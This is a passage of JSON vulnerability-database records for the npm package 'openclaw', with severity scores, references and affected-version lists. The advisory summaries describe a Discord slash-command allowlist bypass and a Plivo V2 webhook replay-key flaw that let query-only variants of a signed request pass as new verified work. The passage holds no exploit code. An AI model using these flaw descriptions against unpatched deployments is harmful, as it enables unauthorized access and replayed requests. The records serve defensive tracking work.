yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.4.2"}],"aliases":["CVE-2026-41295","GHSA-2qrv-rc5x-2g2h"],"risk_score":3.9,"exploitability":"0.5","weighted_severity":"7.7","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-una1-gxkk-t3bp"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/89664?format=json","vulnerability_id":"VCID-uy97-p1ex-y7df","summary":"OpenClaw: Discord Slash Commands Bypass Group DM Channel Allowlist\n## Summary\nDiscord Slash Commands Bypass Group DM Channel Allowlist\n\n## Current Maintainer Triage\n- Status: narrow\n- Normalized severity: moderate\n- Assessment: v2026.3.28 native Discord slash and autocomplete paths still skip 
the group-DM allowlist, but impact is limited to already-authorized Discord users bypassing a channel restriction rather than crossing a stronger trust boundary.\n\n## Affected Packages / Versions\n- Package: `openclaw` (npm)\n- Latest published npm version: `2026.3.31`\n- Vulnerable version range: `<=2026.3.28`\n- Patched versions: `>= 2026.3.31`\n- First stable tag containing the fix: `v2026.3.31`\n\n## Fix Commit(s)\n- `8fdb19676ab44cf85d47ee13c578195f2e527591` — 2026-03-30T11:17:36-06:00\n\nOpenClaw thanks @nexrin for reporting.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-41348","reference_id":"","reference_type":"","scores":[{"value":"0.00034","scoring_system":"epss","scoring_elements":"0.10417","published_at":"2026-06-05T12:55:00Z"},{"value":"0.00034","scoring_system":"epss","scoring_elements":"0.10395","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00034","scoring_system":"epss","scoring_elements":"0.10436","published_at":"2026-06-06T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-41348"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N"},{"value":"2.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/8fdb19676ab44cf85d47ee13c578195f2e527591","reference_id":"","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N"},{"value":"2.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""}],"url
":"https://github.com/openclaw/openclaw/commit/8fdb19676ab44cf85d47ee13c578195f2e527591"},{"reference_url":"https://github.com/openclaw/openclaw/releases/tag/v2026.3.31","reference_id":"","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N"},{"value":"2.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/releases/tag/v2026.3.31"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-rvvf-6vh3-9j43","reference_id":"","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N"},{"value":"LOW","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"2.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-rvvf-6vh3-9j43"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-41348","reference_id":"","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N"},{"value":"2.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-41348"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-group-dm-channel-allowlist-bypass-via-discord-slash-commands","reference_id":"","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N"},{"value":"2.3","scoring_
system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://www.vulncheck.com/advisories/openclaw-group-dm-channel-allowlist-bypass-via-discord-slash-commands"},{"reference_url":"https://github.com/advisories/GHSA-rvvf-6vh3-9j43","reference_id":"GHSA-rvvf-6vh3-9j43","reference_type":"","scores":[{"value":"LOW","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-rvvf-6vh3-9j43"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109907?format=json","purl":"pkg:npm/openclaw@2026.3.31","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCI
D-c25h-khws-2fc3"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kxmf-d7w1-xfcv"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-pj41-sunw-vbcj"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vfbb-bpy9-87ey"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCI
D-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.31"}],"aliases":["CVE-2026-41348","GHSA-rvvf-6vh3-9j43"],"risk_score":2.5,"exploitability":"0.5","weighted_severity":"4.9","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-uy97-p1ex-y7df"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/91856?format=json","vulnerability_id":"VCID-v1bp-hw9a-yffz","summary":"OpenClaw: Plivo V2 verified replay identity drifts on query-only variants\n## Summary\nBefore `v2026.3.23`, the Plivo V2 verification path treated query-only variants of the same signed request as fresh verified work. Plivo V2 signatures authenticate `baseUrl + nonce`, but the replay key was derived from the full verification URL including the query string, so unsigned query-only changes minted a new `verifiedRequestKey`.\n\n## Affected Packages / Versions\n- Package: `openclaw` (npm)\n- Affected: `< 2026.3.23`\n- Fixed: `>= 2026.3.23`\n- Latest released tag checked: `v2026.3.23-2` (`630f1479c44f78484dfa21bb407cbe6f171dac87`)\n- Latest published npm version checked: `2026.3.23-2`\n\n## Root Cause\nThe vulnerable logic lived in `extensions/voice-call/src/webhook-security.ts`. 
V2 signature validation already canonicalized to the base URL without query parameters, but the replay key used the full `verificationUrl`, letting query-only variants bypass replay identity stability.\n\n## Fix Commit(s)\n- `b0ce53a79cf63834660270513e26d921899b4e5b` — `fix(voice-call): stabilize plivo v2 replay keys`\n\n## Release Status\nThe fix commit is contained in released tags `v2026.3.23` and `v2026.3.23-2`. The latest shipped tag and npm release both include the fix.\n\n## Code-Level Confirmation\n- `extensions/voice-call/src/webhook-security.ts` now derives the V2 replay key with `createPlivoV2ReplayKey(...)`, which hashes `getBaseUrlNoQuery(url)` plus the nonce.\n- `extensions/voice-call/src/webhook-security.test.ts` contains the regression test `treats query-only V2 variants as the same verified request`.\n\nThanks @smaeljaish771 for reporting.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-35618","reference_id":"","reference_type":"","scores":[{"value":"0.00042","scoring_system":"epss","scoring_elements":"0.133","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00042","scoring_system":"epss","scoring_elements":"0.13342","published_at":"2026-06-06T12:55:00Z"},{"value":"0.00042","scoring_system":"epss","scoring_elements":"0.13338","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-35618"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"8.2","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/630f1479c44f78484dfa21bb407cbe6f171dac87","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/
C:L/I:H/A:N"},{"value":"8.2","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"8.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:L/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-10T12:33:06Z/"}],"url":"https://github.com/openclaw/openclaw/commit/630f1479c44f78484dfa21bb407cbe6f171dac87"},{"reference_url":"https://github.com/openclaw/openclaw/commit/b0ce53a79cf63834660270513e26d921899b4e5b","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:H/A:N"},{"value":"8.2","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"8.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:L/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-10T12:33:06Z/"}],"url":"https://github.com/openclaw/openclaw/commit/b0ce53a79cf63834660270513e26d921899b4e5b"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-cg6c-q2hx-69h7","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:H/A:N"},{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"8.2","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"8.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:L/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_
elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-10T12:33:06Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-cg6c-q2hx-69h7"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-35618","reference_id":"","reference_type":"","scores":[{"value":"8.2","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-35618"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-replay-identity-drift-via-query-only-variants-in-plivo-v2-verification","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:H/A:N"},{"value":"8.2","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"8.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:L/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-10T12:33:06Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-replay-identity-drift-via-query-only-variants-in-plivo-v2-verification"},{"reference_url":"https://github.com/advisories/GHSA-cg6c-q2hx-69h7","reference_id":"GHSA-cg6c-q2hx-69h7","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-cg6c-q2hx-69h7"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/110761?format=json","purl":"pkg:npm/openclaw@2026.3.23","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1j3m-fecr-f7cn"},{"vulnerability":"VCID-1p3b-pfnn-x7ad"},{"vulnera
bility":"VCID-1p5p-eth5-3ufu"},{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-1smq-mbty-jkaj"},{"vulnerability":"VCID-24m7-jx1g-hqde"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-26kp-dbu2-pqej"},{"vulnerability":"VCID-26sg-e29u-hkf3"},{"vulnerability":"VCID-26sv-grsd-abcw"},{"vulnerability":"VCID-294z-6z8j-97bx"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2hca-3v8f-f3e8"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-2uqu-k42d-1baq"},{"vulnerability":"VCID-2v8n-mnws-jfc9"},{"vulnerability":"VCID-2wr9-h42m-a7ev"},{"vulnerability":"VCID-32zs-2zs9-uufs"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-37ep-9smd-zuh9"},{"vulnerability":"VCID-384t-z1h8-pfft"},{"vulnerability":"VCID-38g8-39ek-xbat"},{"vulnerability":"VCID-3bdd-a9nw-13bn"},{"vulnerability":"VCID-3wsw-d4z2-dydt"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-3zx4-t8cj-kbfn"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4hz5-f2pw-3yb4"},{"vulnerability":"VCID-4jwj-6s5z-wbeq"},{"vulnerability":"VCID-4nwq-14y4-xkhp"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4uqc-3h1c-4yhs"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-5atj-2a7b-57g5"},{"vulnerability":"VCID-5rgx-2krs-guck"},{"vulnerability":"VCID-6849-th74-yqd5"},{"vulnerability":"VCID-6bxd-kbse-sudx"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7dyw-9b37-yqh4"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7wmr-v7zb-6fc9"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnera
bility":"VCID-8uzb-xmf8-hbca"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9jjv-aa8k-rke1"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9pj9-7b12-jbea"},{"vulnerability":"VCID-9uyu-y9qv-u7e1"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-9xrt-mv81-3yc8"},{"vulnerability":"VCID-9yxw-fj1c-tff9"},{"vulnerability":"VCID-a2p8-ydn6-3bbr"},{"vulnerability":"VCID-a2wx-7b8h-c3h1"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-atn7-pn13-3fgb"},{"vulnerability":"VCID-axp9-mt9z-gkgw"},{"vulnerability":"VCID-aye6-1fwu-nkc5"},{"vulnerability":"VCID-b9w3-w2nq-cqg6"},{"vulnerability":"VCID-bg1d-gmxy-wkc6"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bk76-1ctt-tkaw"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-bnfh-rsk9-cfea"},{"vulnerability":"VCID-brfj-4shr-qkgc"},{"vulnerability":"VCID-bumq-54sb-6ua7"},{"vulnerability":"VCID-bzw7-yvu2-yqa2"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-c4yt-z48z-zygv"},{"vulnerability":"VCID-c76v-4577-n7c6"},{"vulnerability":"VCID-carm-gpgh-wbbf"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-csnc-r6fv-j3en"},{"vulnerability":"VCID-cvmw-sxfq-dyhz"},{"vulnerability":"VCID-cvxu-rdbu-abd2"},{"vulnerability":"VCID-cwd3-ecym-sfaw"},{"vulnerability":"VCID-d3qp-5wm9-aqfp"},{"vulnerability":"VCID-d864-qy75-c3dx"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-da47-zdf1-mfgf"},{"vulnerability":"VCID-dbcw-brhj-k7hs"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-djqx-bwuu-4uc1"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-fekn-d6f3-xfa6"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-g3hg-peh1-tudm"},{"vulnera
bility":"VCID-g8r6-x6s5-uydq"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-gvam-2net-8kc5"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hd4w-s3dp-nubj"},{"vulnerability":"VCID-hkqd-6khg-m3hj"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-j8fb-fhyc-33fu"},{"vulnerability":"VCID-j92n-5217-9bhj"},{"vulnerability":"VCID-j96c-kau3-7fag"},{"vulnerability":"VCID-jbwa-scg3-efeq"},{"vulnerability":"VCID-jdqk-kv8u-xqa9"},{"vulnerability":"VCID-jhah-j2td-t3dp"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-k3up-1vdf-2uh9"},{"vulnerability":"VCID-k52b-966p-ybbk"},{"vulnerability":"VCID-k5da-7tht-w3bs"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kzgh-7f6h-kfd1"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mcz5-wgu1-z7g7"},{"vulnerability":"VCID-mggy-bv5s-5uax"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nfva-pukn-uqch"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7me-4bzz-83cm"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pa1f-qzsh-efa9"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pc9z-x5wk-8ue7"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-q9jf-srt4-fbcg"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-qjvc-etb4-qbfv"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-r9y1-z2ax-z3e2"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnera
bility":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-s3wz-3yzf-ybhz"},{"vulnerability":"VCID-sja9-6t41-hud8"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-t991-75e7-ykdv"},{"vulnerability":"VCID-te8f-snty-j7hh"},{"vulnerability":"VCID-tf28-1z2z-5yfn"},{"vulnerability":"VCID-tk9h-nqrz-uugp"},{"vulnerability":"VCID-u1ru-vdfp-x3hu"},{"vulnerability":"VCID-u6hw-ffpj-4yd9"},{"vulnerability":"VCID-u9cw-crg5-1kbs"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-uy97-p1ex-y7df"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vfbb-bpy9-87ey"},{"vulnerability":"VCID-vktg-77tu-vycv"},{"vulnerability":"VCID-vm8g-hrvu-quhm"},{"vulnerability":"VCID-vqrj-z6tx-rff2"},{"vulnerability":"VCID-vtqt-bgz7-yub6"},{"vulnerability":"VCID-vx5d-3d98-7kf3"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2rd-2j4p-gfgw"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-watb-49vx-yub1"},{"vulnerability":"VCID-wkye-je9r-1fba"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wx44-n3fr-skah"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-x4hn-ygbg-mkep"},{"vulnerability":"VCID-x794-wf